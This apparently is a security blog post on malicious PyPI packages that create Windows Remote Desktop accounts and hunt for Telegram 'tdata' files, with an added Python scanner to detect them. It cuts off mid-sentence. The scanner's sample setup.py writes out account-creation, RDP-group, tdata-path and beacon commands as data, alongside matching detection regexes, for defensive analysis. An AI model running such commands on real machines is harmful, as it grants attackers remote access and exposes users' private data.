This week, Sonatype discovered several malicious PyPI packages that set up new remote desktop user accounts on your Windows computer or steal encrypted Telegram data files from your Telegram Desktop client.
These packages were discovered by Sonatype’s automated malware detection system, offered as part of the Nexus platform products, including Nexus Firewall. Upon further investigation, we deemed these packages malicious and reported them to PyPI.
The main packages of interest are:
Create Remote Desktop Access Accounts in Windows
The two packages ‘flask-requests-complex’ and ‘php-requests-complex’ contain no description but are certainly named after the popular ‘requests’ module.
Both of these packages contain code that adds a new, attacker-created user account to the “Remote Desktop Users” group on Windows, allowing the attacker to log in to the machine over RDP at will.
Additionally, the packages have been seen making a simple HTTP request to a third-party URL, likely to inform the threat actor that the attack was successful.
Steals Telegram cache and settings files ‘tdata’
The ‘tkinter-message-box’ package is yet another example of a malicious package named after ‘tkinter’, Python’s standard GUI toolkit interface, and it likewise has no valid description:
But ‘tkinter-message-box’ does not contain any UI-related code or a message box utility. Instead, it attempts to locate where your Telegram Desktop client stores its “tdata” files:
‘tdata’ files are supposed to be encrypted files generated by the Telegram Desktop client to store settings and cache. Although cache files are unlikely to contain entire chat histories, they may contain JPG images, videos, and other media exchanged through the Telegram app that remain on the device temporarily.
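A defender can catch both behaviours described above (the RDP account/group manipulation and the Telegram ‘tdata’ lookup, plus the install-time HTTP beacon) before a package is installed by statically scanning its setup code. The following is an added example, not Sonatype’s detector or the packages’ own code; the sample source it scans is constructed to mimic the described behaviour, with placeholder account names and a placeholder URL.

```python
import ast
import re

# Constructed sample that mimics the behaviours described in the post (not the real package code).
SAMPLE_SETUP_PY = '''
import os, subprocess, urllib.request
subprocess.call("net user helper Passw0rd /add", shell=True)
os.system('net localgroup "Remote Desktop Users" helper /add')
tdata = os.path.join(os.getenv("APPDATA", ""), "Telegram Desktop", "tdata")
urllib.request.urlopen("http://beacon.example.invalid/done")
'''

# Command-line patterns for the two Windows account actions the post describes.
SHELL_INDICATORS = {
    "local_user_add": re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "rdp_group_add": re.compile(r'\bnet\s+localgroup\s+"?remote desktop users"?', re.I),
}
SHELL_FUNCS = {"system", "popen", "call", "run", "Popen", "check_call", "check_output"}
NETWORK_FUNCS = {"urlopen", "get", "post", "Request"}


def _call_name(node):
    # subprocess.call(...) -> "call"; system(...) -> "system"
    func = node.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")


def scan_source(src):
    """Return a sorted list of indicator names found in the given Python source."""
    tree = ast.parse(src)
    findings = set()
    strings = [n.value for n in ast.walk(tree)
               if isinstance(n, ast.Constant) and isinstance(n.value, str)]
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        arg_text = " ".join(a.value for a in node.args
                            if isinstance(a, ast.Constant) and isinstance(a.value, str))
        if name in SHELL_FUNCS:
            for key, pattern in SHELL_INDICATORS.items():
                if pattern.search(arg_text):
                    findings.add(key)
        elif name in NETWORK_FUNCS and arg_text.lower().startswith("http"):
            findings.add("install_time_http_beacon")
    # Telegram Desktop keeps its encrypted settings/cache under a "tdata" folder.
    lowered = [s.lower() for s in strings]
    if any("tdata" in s for s in lowered) and any("telegram" in s for s in lowered):
        findings.add("telegram_tdata_path")
    return sorted(findings)
```

Run `scan_source` over each `setup.py` in a package before installation; a non-empty result is a reason to quarantine the package for manual review rather than a verdict on its own.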
All of these packages were posted by the same “ternary ternary” PyPI account that has posted seven packages in total so far, almost all of which look suspicious.
Some packages, such as ‘bs4tools